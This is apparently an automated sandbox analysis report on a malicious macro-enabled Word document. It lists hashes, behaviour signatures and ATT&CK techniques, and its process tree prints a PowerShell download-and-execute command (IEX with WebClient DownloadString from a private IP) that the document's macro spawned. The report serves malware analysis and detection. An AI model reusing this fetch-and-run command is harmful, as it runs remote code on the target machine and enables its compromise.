Analysis

  • max time kernel
    142s
  • max time network
    166s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-11-2022 21:29

General

  • Target

    ce7d9b0734436d37674c5e9b91d67431.docm

  • Size

    17KB

  • MD5

    ce7d9b0734436d37674c5e9b91d67431

  • SHA1

    2ce909f8c0d4dc8b684743c4a45b335a79124e96

  • SHA256

    ed4ae4ef8a0e7a00159b884ae86154f6bf3d41a3911276eee795965735292456

  • SHA512

    ae6c4421bf9a3944b287b2266f3f184fdcba03a20a358ae25778c2f87ab09a26ac2ee66d9276303edb269f2a4313bf083693bf3673b6b7783eca2f63fee22b6b

  • SSDEEP

    384:Bnh0AtxoAKtkKERlcPNxt/ZtNNMNKuTVLa+0txyq3:BnuKuAKbSUxllNMl+ZsU

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://192.168.40.128/fund.txt

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ce7d9b0734436d37674c5e9b91d67431.docm" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2548
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe "IEX ((new-object net.webclient).downloadstring('http://192.168.40.128/fund.txt'))"
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4748

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2548-145-0x00007FF8FBB30000-0x00007FF8FBB40000-memory.dmp
    Filesize

    64KB

  • memory/2548-132-0x00007FF8FBB30000-0x00007FF8FBB40000-memory.dmp
    Filesize

    64KB

  • memory/2548-134-0x00007FF8FBB30000-0x00007FF8FBB40000-memory.dmp
    Filesize

    64KB

  • memory/2548-135-0x00007FF8FBB30000-0x00007FF8FBB40000-memory.dmp
    Filesize

    64KB

  • memory/2548-148-0x00007FF8FBB30000-0x00007FF8FBB40000-memory.dmp
    Filesize

    64KB

  • memory/2548-137-0x00007FF8F9330000-0x00007FF8F9340000-memory.dmp
    Filesize

    64KB

  • memory/2548-133-0x00007FF8FBB30000-0x00007FF8FBB40000-memory.dmp
    Filesize

    64KB

  • memory/2548-138-0x00007FF8F9330000-0x00007FF8F9340000-memory.dmp
    Filesize

    64KB

  • memory/2548-136-0x00007FF8FBB30000-0x00007FF8FBB40000-memory.dmp
    Filesize

    64KB

  • memory/2548-147-0x00007FF8FBB30000-0x00007FF8FBB40000-memory.dmp
    Filesize

    64KB

  • memory/2548-146-0x00007FF8FBB30000-0x00007FF8FBB40000-memory.dmp
    Filesize

    64KB

  • memory/4748-140-0x00000203E1A70000-0x00000203E1A92000-memory.dmp
    Filesize

    136KB

  • memory/4748-143-0x00007FF9108F0000-0x00007FF9113B1000-memory.dmp
    Filesize

    10.8MB

  • memory/4748-142-0x00007FF9108F0000-0x00007FF9113B1000-memory.dmp
    Filesize

    10.8MB

  • memory/4748-141-0x00007FF9108F0000-0x00007FF9113B1000-memory.dmp
    Filesize

    10.8MB

  • memory/4748-139-0x0000000000000000-mapping.dmp